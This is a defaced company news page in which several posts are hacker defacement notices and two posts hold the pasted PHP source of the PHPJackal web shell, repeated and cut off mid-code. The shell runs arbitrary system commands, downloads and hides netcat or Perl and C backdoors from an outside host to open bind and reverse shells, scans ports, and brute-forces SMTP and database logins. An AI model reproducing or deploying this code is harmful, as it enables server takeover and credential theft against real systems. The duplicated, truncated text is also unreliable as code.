Email us

Fill out the simple form below and we’ll get back to you.

Latest Money Tailor News

HACKED.php

Wednesday, February 23rd 2011

Hacked By Albanian Attackers !

This Site Has Been Hacked ! :)

SiR.fLoOR & ILLYRIAN ~

Sorry Admin But Your Security =0 :) !

To Prefixes This Problem Contact With Me :

floorche.-@live.com

zzz

Tuesday, May 4th 2010

$value)$_REQUEST[$key]=stripslashes($value); } function hlinK($str=''){ $myvars=array('modE','chmoD','workingdiR','urL','cracK',' imagE','namE','filE','downloaD','seC','cP','mV','rN','deL '); $ret=$_SERVER['PHP_SELF'].'?'; $new=explode('&',$str); foreach($_GET as $key => $v){ $add=1; foreach($new as $m){ $el=explode('=',$m); if($el[0]==$key)$add=0; } if($add){if(!in_array($key,$myvars))$ret.="$key=$v&";} } $ret.=$str; return $ret; } $et=''; if(!empty($login_password)){ if(!empty($_REQUEST['fpassw'])){ if($_REQUEST['fpassw']==$login_password)setcookie('passw' ,md5($_REQUEST['fpassw'])); header('Location: '.hlinK()); } if(empty($_COOKIE['passw']) || $_COOKIE['passw']!=md5($login_password))die("

Password:

$et"); } if(!empty($_REQUEST['workingdiR']))chdir($_REQUEST['worki ngdiR']); $disablefunctions=ini_get('disable_functions'); $disablefunctions=explode(',',$disablefunctions); function checkthisporT($ip,$port,$timeout,$type=0){ if(!$type){ $scan=fsockopen($ip,$port,$n,$s,$timeout); if($scan){fclose($scan);return 1;} } elseif(function_exists('socket_set_timeout')){ $scan=fsockopen("udp://$ip",$port); if($scan){ socket_set_timeout($scan,$timeout); fwrite($scan,"\x00"); $s=time(); fread($scan,1); if((time()-$s)>=$timeout){fclose($scan);return 1;} } } return 0; } if(!function_exists('file_get_contents')){ function file_get_contents($addr){ $a=fopen($addr,'r'); $tmp=fread($a,filesize($a)); fclose($a); if($a)return $tmp;else return null; } } if(!function_exists('file_put_contents')){ function file_put_contents($addr,$con){ $a=fopen($addr,'w'); if(!$a)return 0; $t=fwrite($a,$con); fclose($a); if($t)return strlen($con); return 0; } } function file_add_contentS($addr,$con){ $a=fopen($addr,'a'); if(!$a)return 0; fwrite($a,$con); fclose($a); return strlen($con); } if(!empty($_REQUEST['chmoD']) && !empty($_REQUEST['modE']))chmod($_REQUEST['chmoD'],'0'.$_ REQUEST['modE']); if(!empty($_REQUEST['downloaD'])){ ob_clean(); $dl=$_REQUEST['downloaD']; $con=file_get_contents($dl); header('Content-type: application/octet-stream'); header("Content-disposition: attachment; filename=\"$dl\";"); header('Content-length: '.strlen($con)); echo $con; exit; } if(!empty($_REQUEST['imagE'])){ $img=$_REQUEST['imagE']; header('Content-type: imagE/gif'); header("Content-length: ".filesize($img)); header("Last-Modified: ".date('r',filemtime($img))); echo file_get_contents($img); exit; } if(!empty($_REQUEST['exT'])){ $ex=$_REQUEST['exT']; $e=get_extension_funcs($ex); echo ''.htmlspecialchars($ex).'Functions:
';foreach($e as $k=>$f){$i=$k+1;echo "$i)$f ";if(in_array($f,$disablefunctions))echo 'DISABLED';echo '
';} echo ''; exit; } header('Cache-Control: no-cache, must-revalidate'); header('Expires: Mon, 7 Aug 1987 05:00:00 GMT'); function showsizE($size){ if($size>=1073741824)$size=round(($size/1073741824),2).' GB'; elseif($size>=1048576)$size=round(($size/1048576),2).' MB'; elseif($size>=1024)$size=round(($size/1024),2).' KB'; else $size.=' B'; return $size; } $windows=(substr((strtoupper(php_uname())),0,3)=='WIN')?1 :0; $errorbox="

Error: "; $v='1.9'; $cwd=getcwd(); $msgbox="

"; $intro="

Script:
".str_repeat('-=-',25 )."
Name: PHPJackal
Version: $v

Author:
".str_repeat('-=-',25)."
< b>Name: NetJackal
Country: Iran
Website: http://netjackal.by.ru/
Email:< /b> nima_5 01@yahoo.com
$et"; $footer="${msgbox}PHPJackal v$v - Powered By NetJackal$et"; $hcwd=""; $t="
"; $crack="
Dictionary:
Dictionary type: Simple (P)Combo (U:P)
Username:
Server:
Log $hcwd $et"; function checkfunctioN($func){ global $disablefunctions,$safemode; $safe=array('passthru','system','exec','exec','shell_exec ','popen','proc_open'); if($safemode=='ON' && in_array($func,$safe))return 0; elseif(function_exists($func) && is_callable($func) && !in_array($func,$disablefunctions))return 1; return 0; } function whereistmP(){ $uploadtmp=ini_get('upload_tmp_dir'); $uf=getenv('USERPROFILE'); $af=getenv('ALLUSERSPROFILE'); $se=ini_get('session.save_path'); $envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP'); if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp'; if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp'; if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp'; if(is_dir($uf) && is_writable($uf))return $uf; if(is_dir($af) && is_writable($af))return $af; if(is_dir($se) && is_writable($se))return $se; if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp; if(is_dir($envtmp) && is_writable($envtmp))return $envtmp; return '.'; } function shelL($command){ global $windows; $exec=$output=''; $dep[]=array('pipe','r');$dep[]=array('pipe','w'); if(checkfunctioN('passthru')){ob_start();passthru($comman d);$exec=ob_get_contents();ob_clean();ob_end_clean();} elseif(checkfunctioN('system')){$tmp=ob_get_contents();ob _clean();system($command);$output=ob_get_contents();ob_cl ean();$exec=$tmp;} elseif(checkfunctioN('exec')){exec($command,$output);$out put=join("\n",$output);$exec=$output;} elseif(checkfunctioN('shell_exec'))$exec=shell_exec($comm and); elseif(checkfunctioN('popen')){$output=popen($command,'r' );while(!feof($output)){$exec=fgets($output);}pclose($out put);} elseif(checkfunctioN('proc_open')){$res=proc_open($comman d,$dep,$pipes);while(!feof($pipes[1])){$line=fgets($pipes [1]);$output.=$line;}$exec=$output;proc_close($res);} elseif(checkfunctioN('win_shell_execute'))$exec=winshelL( $command); elseif(checkfunctioN('win32_create_service'))$exec=srvshe lL($command); elseif(is_object($ws=new COM('WScript.Shell')))$exec=comshelL($command,$ws); return $exec; } function getiT($get){ $fo=strtolower(ini_get('allow_url_fopen')); $ui=strtolower(ini_get('allow_url_include')); if($fo || $fo=='on')$con=file_get_contents($get); elseif($ui || $ui=='on'){ ob_start(); include('http://netjackal.net/'); $con=ob_get_contents(); ob_end_clean(); } else{ $u=parse_url($get); $host=$u['host'];$file=(empty($u['path']))?'/':$u['path'] ;$port=(empty($u['port']))?80:$u['port']; $url=fsockopen($host,$port,$en,$es,12); fputs($url,"GET $file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n"); $tmp=$con=''; while($tmp!="\r\n")$tmp=fgets($url); while(!feof($url))$con.=fgets($url); } return $con; } function downloadiT($get,$put){ $con=getiT($get); $mk=file_put_contents($put,$con); if($mk)return 1; return 0; } function winshelL($command){ $name=whereistmP()."\\".uniqid('NJ'); win_shell_execute('cmd.exe','',"/C $command >\"$name\""); sleep(1); $exec=file_get_contents($name); unlink($name); return $exec; } function srvshelL($command){ $name=whereistmP()."\\".uniqid('NJ'); $n=uniqid('NJ'); $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\ \cmd.exe':$_SERVER['ComSpec']; win32_create_service(array('service'=>$n,'display'=>$n,'p ath'=>$cmd,'params'=>"/c $command >\"$name\"")); win32_start_service($n); win32_stop_service($n); win32_delete_service($n); sleep(1); $exec=file_get_contents($name); unlink($name); return $exec; } function comshelL($command,$ws){ $exec=$ws->exec ("cmd.exe /c $command"); $so=$exec->StdOut(); return $so->ReadAll(); } function smtpchecK($addr,$user,$pass,$timeout){ $sock=fsockopen($addr,25,$n,$s,$timeout); if(!$sock)return -1; fread($sock,1024); fputs($sock,'ehlo '.uniqid('NJ')."\r\n"); $res=substr(fgets($sock,512),0,1); if($res!='2')return 0; fgets($sock,512);fgets($sock,512);fgets($sock,512); fputs($sock,"AUTH LOGIN\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='334')return 0; fputs($sock,base64_encode($user)."\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='334')return 0; fputs($sock,base64_encode($pass)."\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='235')return 0; return 1; } function mysqlchecK($host,$user,$pass,$timeout){ if(function_exists('mysql_connect')){ $l=mysql_connect($host,$user,$pass); if($l)return 1; } return 0; } function mssqlchecK($host,$user,$pass,$timeout){ if(function_exists('mssql_connect')){ $l=mssql_connect($host,$user,$pass); if($l)return 1; } return 0; } function checksmtP($host,$timeout){ $from=strtolower(uniqid('nj')).'@'.strtolower(uniqid('nj' )).'.com'; $sock=fsockopen($host,25,$n,$s,$timeout); if(!$sock)return -1; $res=substr(fgets($sock,512),0,3); if($res!='220')return 0; fputs($sock,'HELO '.uniqid('NJ')."\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='250')return 0; fputs($sock,"MAIL FROM: <$from>\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='250')return 0; fputs($sock,"RCPT TO: \r\n"); $res=substr(fgets($sock,512),0,3); if($res!='250')return 0; fputs($sock,"DATA\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='354')return 0; fputs($sock,"From: ".uniqid('NJ')." ".uniqid('NJ')." <$from>\r\nSubject: ".uniqid('NJ')."\r\nMIME-Version: 1.0\r\nContent-Type: text/plain;\r\n\r\n".uniqid('Hello ',true)."\r\n.\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='250')return 0; return 1; } function replace_stR($s,$h){ $ret=$h; foreach($s as $k=>$r)$ret=str_replace($k,$r,$ret); return $ret; } function check_urL($url,$method,$search='200',$timeout=3){ $u=parse_url($url); $method=strtoupper($method); $host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/ ';$port=(empty($u['port']))?80:$u['port']; $data=(!empty($u['query']))?$u['query']:''; if(!empty($data))$data="?$data"; $sock=fsockopen($host,$port,$en,$es,$timeout); if($sock){ fputs($sock,"$method $file$data HTTP/1.0\r\n"); fputs($sock,"Host: $host\r\n"); if($method=='GET')fputs($sock,"\r\n"); elseif($method=='POST')fputs($sock,'Content-Type: application/x-www-form-urlencoded\r\nContent-length: '.strlen($data)."\r\nAccept-Encoding: text\r\nConnection: close\r\n\r\n$data"); else return 0; if($search=='200')if(strstr(fgets($sock),'200')){fclose($ sock);return 1;}else{fclose($sock);return 0;} while(!feof($sock)){ $res=fgets($sock); if(!empty($res))if(strstr($res,$search)){fclose($sock);re turn 1;} } fclose($sock); } return 0; } function get_sw_namE($host,$timeout){ $sock=fsockopen($host,80,$en,$es,$timeout); if($sock){ $page=uniqid('NJ'); fputs($sock,"GET /$page HTTP/1.0\r\n\r\n"); while(!feof($sock)){ $con=fgets($sock); if(strstr($con,'Server:')){$ser=substr($con,strpos($con,' ')+1);return $ser;} } fclose($sock); return -1; }return 0; } function snmpchecK($ip,$com,$timeout){ $res=0; $n=chr(0x00); $packet=chr(0x30).chr(0x26).chr(0x02).chr(0x01).chr(0x00) .chr(0x04).chr(strlen($com)).$com.chr(0xA0).chr(0x19).chr (0x02).chr(0x01).chr(0x01).chr(0x02).chr(0x01).$n.chr(0x0 2).chr(0x01).$n.chr(0x30).chr(0x0E).chr(0x30).chr(0x0C).c hr(0x06).chr(0x08).chr(0x2B).chr(0x06).chr(0x01).chr(0x02 ).chr(0x01).chr(0x01).chr(0x01).$n.chr(0x05).$n; $sock=fsockopen("udp://$ip",161); if(function_exists('socket_set_timeout'))socket_set_timeo ut($sock,$timeout); fputs($sock,$packet); socket_set_timeout($sock,$timeout); $res=fgets($sock); fclose($sock); if($res != '')return 1;else return 0; } $safemode=(ini_get('safe_mode') || strtolower(ini_get('safe_mode'))=='on')?'ON':'OFF'; if($safemode=='ON'){ini_restore('safe_mode');ini_restore( 'open_basedir');} function brshelL(){ global $errorbox,$windows,$et,$hcwd; $_REQUEST['C']=(isset($_REQUEST['C']))?$_REQUEST['C']:0; $addr='http://netjackal.by.ru/br'; $error="$errorbox Can not make backdoor file, go to writeable folder.$et"; $n=uniqid('NJ_'); if(!$windows)$n=".$n"; $d=whereistmP(); $name=$d.DIRECTORY_SEPARATOR.$n; $c=($_REQUEST['C'])?1:0; if(!empty($_REQUEST['port']) && ($_REQUEST['port']<=65535) && ($_REQUEST['port']>=1)){ $port=(int)$_REQUEST['port']; if($windows){ if($c){ $name.='.exe'; $bd=downloadiT("$addr/nc",$name); shelL("attrib +H $name"); if(!$bd)echo $error;else shelL("$name -L -p $port -e cmd.exe"); }else{ $name=$name.'.pl'; $bd=downloadiT("$addr/winbind.p",$name); shelL("attrib +H $name"); if(!$bd)echo $error;else shelL("perl $name $port"); } } else{ if($c){ $bd=downloadiT("$addr/bind.c",$name); if(!$bd)echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $port &"); }else{ $bd=downloadiT("$addr/bind.p",$name); if(!$bd)echo $error;else shelL("cd $d;perl $n $port &"); echo "Backdoor is waiting for you on $port.
"; } } } elseif(!empty($_REQUEST['rport']) && ($_REQUEST['rport']<=65535) && ($_REQUEST['rport']>=1) && !empty($_REQUEST['ip'])){ $ip=$_REQUEST['ip']; $port=(int)$_REQUEST['rport']; if($windows){ if($c){ $name.='.exe'; $bd=downloadiT("$addr/nc",$name); shelL("attrib +H $name"); if(!$bd)echo $error;else shelL("$name $ip $port -e cmd.exe"); }else{ $name=$name.'.pl'; $bd=downloadiT("$addr/winrc.p",$name); shelL("attrib +H $name"); if (!$bd)echo $error;else shelL("perl.exe $name $ip $port"); } } else{ if($c){ $bd=downloadiT("$addr/rc.c",$name); if(!$bd)echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $ip $port &"); }else{ $bd=downloadiT("$addr/rc.p",$name); if(!$bd)echo $error;else shelL("cd $d;perl $n $ip $port &"); } } echo 'Done!';} else{echo "
Bind shell:
Port:
Type: PERL";if($windows)echo 'EXE';else echo 'C';echo"
$hcwd$et
Reverse shell:
IP:
Port:
Type: PERL";if($windows)echo 'EXE';else echo 'C';echo"
$hcwd$et$et";}} function showimagE($img){ echo "";} function editoR($file){ global $errorbox,$et,$hcwd,$cwd; if(is_file($file)){ if(!is_readable($file)){echo "$errorbox File is not readable$et
";} if(!is_writeable($file)){echo "$errorbox File is not writeable$et
";} $data=file_get_contents($file); echo "
$hcwd
$et
"; echo htmlspecialchars($data); echo " <p><a href='/mtnews/21/zzz'>Read more...</a></p> </div> <div class='news-story'> <h1>Hacked by: Hackers Lebanon (mwahahahhahahhahahahaaaaaaaa)</h1> <p class='date'>Tuesday, May 4th 2010</p> <p> </p> <p> </p> <p> </p> <p><a href='/mtnews/22/hacked-by-hackers-lebanon-mwahahahhahahhahahahaaaaaaaa'>Read more...</a></p> </div> <div class='news-story'> <h1>..</h1> <p class='date'>Friday, November 19th 2010</p> <p>..</p> <p><a href='/mtnews/23/'>Read more...</a></p> </div> <div class='news-story'> <h1>hack?</h1> <p class='date'>Saturday, March 5th 2011</p>  <p>$value)$_REQUEST[$key]=stripslashes($value); } function hlinK($str=''){ $myvars=array('modE','chmoD','workingdiR','urL','cracK',' imagE','namE','filE','downloaD','seC','cP','mV','rN','deL '); $ret=$_SERVER['PHP_SELF'].'?'; $new=explode('&',$str); foreach($_GET as $key ={if(!in_array($key,$myvars))$ret.="$key=$v&";} } $ret.=$str; return $ret; } $et=''; if(!empty($login_password)){ if(!empty($_REQUEST['fpassw'])){ if($_REQUEST['fpassw']==$login_password)setcookie('passw' ,md5($_REQUEST['fpassw'])); header('Location: '.hlinK()); } if(empty($_COOKIE['passw']) || $_COOKIE['passw']!=md5($login_password))die("</p> <table border="0"> <form method="post"></form> <tbody> <tr> <td>Password:</td> <td><input name="seC" type="hidden" value="about" /><input name="fpassw" type="password" /></td> </tr> <tr> <td> </td> <td><input type="submit" value="login" />$et"); } if(!empty($_REQUEST['workingdiR']))chdir($_REQUEST['worki ngdiR']); $disablefunctions=ini_get('disable_functions'); $disablefunctions=explode(',',$disablefunctions); function checkthisporT($ip,$port,$timeout,$type=0){ if(!$type){ $scan=fsockopen($ip,$port,$n,$s,$timeout); if($scan){fclose($scan);return 1;} } elseif(function_exists('socket_set_timeout')){ $scan=fsockopen("udp://$ip",$port); if($scan){ socket_set_timeout($scan,$timeout); fwrite($scan,"\x00"); $s=time(); fread($scan,1); if((time()-$s)>=$timeout){fclose($scan);return 1;} } } return 0; } if(!function_exists('file_get_contents')){ function file_get_contents($addr){ $a=fopen($addr,'r'); $tmp=fread($a,filesize($a)); fclose($a); if($a)return $tmp;else return null; } } if(!function_exists('file_put_contents')){ function file_put_contents($addr,$con){ $a=fopen($addr,'w'); if(!$a)return 0; $t=fwrite($a,$con); fclose($a); if($t)return strlen($con); return 0; } } function file_add_contentS($addr,$con){ $a=fopen($addr,'a'); if(!$a)return 0; fwrite($a,$con); fclose($a); return strlen($con); } if(!empty($_REQUEST['chmoD']) && !empty($_REQUEST['modE']))chmod($_REQUEST['chmoD'],'0'.$_ REQUEST['modE']); if(!empty($_REQUEST['downloaD'])){ ob_clean(); $dl=$_REQUEST['downloaD']; $con=file_get_contents($dl); header('Content-type: application/octet-stream'); header("Content-disposition: attachment; filename=\"$dl\";"); header('Content-length: '.strlen($con)); echo $con; exit; } if(!empty($_REQUEST['imagE'])){ $img=$_REQUEST['imagE']; header('Content-type: imagE/gif'); header("Content-length: ".filesize($img)); header("Last-Modified: ".date('r',filemtime($img))); echo file_get_contents($img); exit; } if(!empty($_REQUEST['exT'])){ $ex=$_REQUEST['exT']; $e=get_extension_funcs($ex); echo ''.htmlspecialchars($ex).'<strong>Functions:</strong><br />';foreach($e as $k=>$f){$i=$k+1;echo "$i)$f ";if(in_array($f,$disablefunctions))echo '<span style="color: red;">DISABLED</span>';echo '<br />';} echo ''; exit; } header('Cache-Control: no-cache, must-revalidate'); header('Expires: Mon, 7 Aug 1987 05:00:00 GMT'); function showsizE($size){ if($size>=1073741824)$size=round(($size/1073741824),2).' GB'; elseif($size>=1048576)$size=round(($size/1048576),2).' MB'; elseif($size>=1024)$size=round(($size/1024),2).' KB'; else $size.=' B'; return $size; } $windows=(substr((strtoupper(php_uname())),0,3)=='WIN')?1 :0; $errorbox=" <table style="border-collapse: collapse; width: 100%;" border="0" cellspacing="0" cellpadding="0" bgcolor="#333333"> <tbody> <tr> <td><strong>Error: </strong>"; $v='1.9'; $cwd=getcwd(); $msgbox="<br /> <table style="border-collapse: collapse; width: 100%;" border="0" cellspacing="0" cellpadding="0" bgcolor="#333333"> <tbody> <tr> <td align="center">"; $intro=" <table style="border-collapse: collapse" border="0"> <tbody> <tr> <td bgcolor="#666666"><strong>Script:</strong><br />".str_repeat('-=-',25 )."<br /><strong>Name:</strong> PHPJackal<br /><strong>Version:</strong> $v<br /><br /><strong>Author:</strong><br />".str_repeat('-=-',25)."<br />< b>Name: NetJackal<br /><strong>Country:</strong> Iran<br /><strong>Website:</strong> <a href="http://netjackal.by.ru/" target="_blank">http://netjackal.by.ru/</a><br /><strong>Email:< /b> <a href="mailto:nima_501@yahoo.com?subject=PHPJackal">nima_5 01@yahoo.com</a><br /><noscript>".str_repeat('-=-',25)."<br ><b>Error: Enable JavaScript in your browser!!!</b></noscript>$et"; $footer="${msgbox}PHPJackal v$v - Powered By <a href="http://netjackal.by.ru/" target="_blank">NetJackal</a>$et"; $hcwd="<input name="workingdiR" type="hidden" value="$cwd" />"; $t=" <table style="border-collapse: collapse; width: 40%;" border="0"> <tbody> <tr> <td width="40%" bgcolor="#333333">"; $crack="</td> <td bgcolor="#333333"> </td> </tr> <form method="POST"></form> <tr> <td width="20%" bgcolor="#666666">Dictionary:</td> <td bgcolor="#666666"><input name="dictionary" size="35" type="text" /></td> </tr> <tr> <td width="20%" bgcolor="#808080">Dictionary type:</td> <td bgcolor="#808080"><input style="border-width: 1px; background-color: #808080;" onclick="document.form.user.disabled = false;" name="combo" type="radio" value="0" />Simple (P)<input style="border-width: 1px; background-color: #808080;" onclick="document.form.user.disabled = true;" name="combo" type="radio" value="1" />Combo (U:P)</td> </tr> <tr> <td width="20%" bgcolor="#666666">Username:</td> <td bgcolor="#666666"><input name="user" size="35" type="text" value="root" /></td> </tr> <tr> <td width="20%" bgcolor="#808080">Server:</td> <td bgcolor="#808080"><input name="target" size="35" type="text" value="localhost" /></td> </tr> <tr> <td width="20%" bgcolor="#666666"><input style="border-width: 1px; background-color: #666666;" onclick="document.form.logfilE.disabled = !document.form.logfilE.disabled;" name="loG" type="checkbox" value="1" />Log</td> <td bgcolor="#666666"><input name="logfilE" size="25" type="text" value="".whereistmP().DIRECTORY_SEPARATOR.".log" /> $hcwd <input class="buttons" type="submit" value="Start" />$et"; function checkfunctioN($func){ global $disablefunctions,$safemode; $safe=array('passthru','system','exec','exec','shell_exec ','popen','proc_open'); if($safemode=='ON' && in_array($func,$safe))return 0; elseif(function_exists($func) && is_callable($func) && !in_array($func,$disablefunctions))return 1; return 0; } function whereistmP(){ $uploadtmp=ini_get('upload_tmp_dir'); $uf=getenv('USERPROFILE'); $af=getenv('ALLUSERSPROFILE'); $se=ini_get('session.save_path'); $envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP'); if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp'; if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp'; if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp'; if(is_dir($uf) && is_writable($uf))return $uf; if(is_dir($af) && is_writable($af))return $af; if(is_dir($se) && is_writable($se))return $se; if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp; if(is_dir($envtmp) && is_writable($envtmp))return $envtmp; return '.'; } function shelL($command){ global $windows; $exec=$output=''; $dep[]=array('pipe','r');$dep[]=array('pipe','w'); if(checkfunctioN('passthru')){ob_start();passthru($comman d);$exec=ob_get_contents();ob_clean();ob_end_clean();} elseif(checkfunctioN('system')){$tmp=ob_get_contents();ob _clean();system($command);$output=ob_get_contents();ob_cl ean();$exec=$tmp;} elseif(checkfunctioN('exec')){exec($command,$output);$out put=join("\n",$output);$exec=$output;} elseif(checkfunctioN('shell_exec'))$exec=shell_exec($comm and); elseif(checkfunctioN('popen')){$output=popen($command,'r' );while(!feof($output)){$exec=fgets($output);}pclose($out put);} elseif(checkfunctioN('proc_open')){$res=proc_open($comman d,$dep,$pipes);while(!feof($pipes[1])){$line=fgets($pipes [1]);$output.=$line;}$exec=$output;proc_close($res);} elseif(checkfunctioN('win_shell_execute'))$exec=winshelL( $command); elseif(checkfunctioN('win32_create_service'))$exec=srvshe lL($command); elseif(is_object($ws=new COM('WScript.Shell')))$exec=comshelL($command,$ws); return $exec; } function getiT($get){ $fo=strtolower(ini_get('allow_url_fopen')); $ui=strtolower(ini_get('allow_url_include')); if($fo || $fo=='on')$con=file_get_contents($get); elseif($ui || $ui=='on'){ ob_start(); include('http://netjackal.net/'); $con=ob_get_contents(); ob_end_clean(); } else{ $u=parse_url($get); $host=$u['host'];$file=(empty($u['path']))?'/':$u['path'] ;$port=(empty($u['port']))?80:$u['port']; $url=fsockopen($host,$port,$en,$es,12); fputs($url,"GET $file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n"); $tmp=$con=''; while($tmp!="\r\n")$tmp=fgets($url); while(!feof($url))$con.=fgets($url); } return $con; } function downloadiT($get,$put){ $con=getiT($get); $mk=file_put_contents($put,$con); if($mk)return 1; return 0; } function winshelL($command){ $name=whereistmP()."\\".uniqid('NJ'); win_shell_execute('cmd.exe','',"/C $command >\"$name\""); sleep(1); $exec=file_get_contents($name); unlink($name); return $exec; } function srvshelL($command){ $name=whereistmP()."\\".uniqid('NJ'); $n=uniqid('NJ'); $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\ \cmd.exe':$_SERVER['ComSpec']; win32_create_service(array('service'=>$n,'display'=>$n,'p ath'=>$cmd,'params'=>"/c $command >\"$name\"")); win32_start_service($n); win32_stop_service($n); win32_delete_service($n); sleep(1); $exec=file_get_contents($name); unlink($name); return $exec; } function comshelL($command,$ws){ $exec=$ws->exec ("cmd.exe /c $command"); $so=$exec->StdOut(); return $so->ReadAll(); } function smtpchecK($addr,$user,$pass,$timeout){ $sock=fsockopen($addr,25,$n,$s,$timeout); if(!$sock)return -1; fread($sock,1024); fputs($sock,'ehlo '.uniqid('NJ')."\r\n"); $res=substr(fgets($sock,512),0,1); if($res!='2')return 0; fgets($sock,512);fgets($sock,512);fgets($sock,512); fputs($sock,"AUTH LOGIN\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='334')return 0; fputs($sock,base64_encode($user)."\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='334')return 0; fputs($sock,base64_encode($pass)."\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='235')return 0; return 1; } function mysqlchecK($host,$user,$pass,$timeout){ if(function_exists('mysql_connect')){ $l=mysql_connect($host,$user,$pass); if($l)return 1; } return 0; } function mssqlchecK($host,$user,$pass,$timeout){ if(function_exists('mssql_connect')){ $l=mssql_connect($host,$user,$pass); if($l)return 1; } return 0; } function checksmtP($host,$timeout){ $from=strtolower(uniqid('nj')).'@'.strtolower(uniqid('nj' )).'.com'; $sock=fsockopen($host,25,$n,$s,$timeout); if(!$sock)return -1; $res=substr(fgets($sock,512),0,3); if($res!='220')return 0; fputs($sock,'HELO '.uniqid('NJ')."\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='250')return 0; fputs($sock,"MAIL FROM: <$from>\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='250')return 0; fputs($sock,"RCPT TO: \r\n"); $res=substr(fgets($sock,512),0,3); if($res!='250')return 0; fputs($sock,"DATA\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='354')return 0; fputs($sock,"From: ".uniqid('NJ')." ".uniqid('NJ')." <$from>\r\nSubject: ".uniqid('NJ')."\r\nMIME-Version: 1.0\r\nContent-Type: text/plain;\r\n\r\n".uniqid('Hello ',true)."\r\n.\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='250')return 0; return 1; } function replace_stR($s,$h){ $ret=$h; foreach($s as $k=>$r)$ret=str_replace($k,$r,$ret); return $ret; } function check_urL($url,$method,$search='200',$timeout=3){ $u=parse_url($url); $method=strtoupper($method); $host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/ ';$port=(empty($u['port']))?80:$u['port']; $data=(!empty($u['query']))?$u['query']:''; if(!empty($data))$data="?$data"; $sock=fsockopen($host,$port,$en,$es,$timeout); if($sock){ fputs($sock,"$method $file$data HTTP/1.0\r\n"); fputs($sock,"Host: $host\r\n"); if($method=='GET')fputs($sock,"\r\n"); elseif($method=='POST')fputs($sock,'Content-Type: application/x-www-form-urlencoded\r\nContent-length: '.strlen($data)."\r\nAccept-Encoding: text\r\nConnection: close\r\n\r\n$data"); else return 0; if($search=='200')if(strstr(fgets($sock),'200')){fclose($ sock);return 1;}else{fclose($sock);return 0;} while(!feof($sock)){ $res=fgets($sock); if(!empty($res))if(strstr($res,$search)){fclose($sock);re turn 1;} } fclose($sock); } return 0; } function get_sw_namE($host,$timeout){ $sock=fsockopen($host,80,$en,$es,$timeout); if($sock){ $page=uniqid('NJ'); fputs($sock,"GET /$page HTTP/1.0\r\n\r\n"); while(!feof($sock)){ $con=fgets($sock); if(strstr($con,'Server:')){$ser=substr($con,strpos($con,' ')+1);return $ser;} } fclose($sock); return -1; }return 0; } function snmpchecK($ip,$com,$timeout){ $res=0; $n=chr(0x00); $packet=chr(0x30).chr(0x26).chr(0x02).chr(0x01).chr(0x00) .chr(0x04).chr(strlen($com)).$com.chr(0xA0).chr(0x19).chr (0x02).chr(0x01).chr(0x01).chr(0x02).chr(0x01).$n.chr(0x0 2).chr(0x01).$n.chr(0x30).chr(0x0E).chr(0x30).chr(0x0C).c hr(0x06).chr(0x08).chr(0x2B).chr(0x06).chr(0x01).chr(0x02 ).chr(0x01).chr(0x01).chr(0x01).$n.chr(0x05).$n; $sock=fsockopen("udp://$ip",161); if(function_exists('socket_set_timeout'))socket_set_timeo ut($sock,$timeout); fputs($sock,$packet); socket_set_timeout($sock,$timeout); $res=fgets($sock); fclose($sock); if($res != '')return 1;else return 0; } $safemode=(ini_get('safe_mode') || strtolower(ini_get('safe_mode'))=='on')?'ON':'OFF'; if($safemode=='ON'){ini_restore('safe_mode');ini_restore( 'open_basedir');} function brshelL(){ global $errorbox,$windows,$et,$hcwd; $_REQUEST['C']=(isset($_REQUEST['C']))?$_REQUEST['C']:0; $addr='http://netjackal.by.ru/br'; $error="$errorbox Can not make backdoor file, go to writeable folder.$et"; $n=uniqid('NJ_'); if(!$windows)$n=".$n"; $d=whereistmP(); $name=$d.DIRECTORY_SEPARATOR.$n; $c=($_REQUEST['C'])?1:0; if(!empty($_REQUEST['port']) && ($_REQUEST['port']<=65535) && ($_REQUEST['port']>=1)){ $port=(int)$_REQUEST['port']; if($windows){ if($c){ $name.='.exe'; $bd=downloadiT("$addr/nc",$name); shelL("attrib +H $name"); if(!$bd)echo $error;else shelL("$name -L -p $port -e cmd.exe"); }else{ $name=$name.'.pl'; $bd=downloadiT("$addr/winbind.p",$name); shelL("attrib +H $name"); if(!$bd)echo $error;else shelL("perl $name $port"); } } else{ if($c){ $bd=downloadiT("$addr/bind.c",$name); if(!$bd)echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $port &"); }else{ $bd=downloadiT("$addr/bind.p",$name); if(!$bd)echo $error;else shelL("cd $d;perl $n $port &"); echo "<span style="color: blue;">Backdoor is waiting for you on $port.<br /></span>"; } } } elseif(!empty($_REQUEST['rport']) && ($_REQUEST['rport']<=65535) && 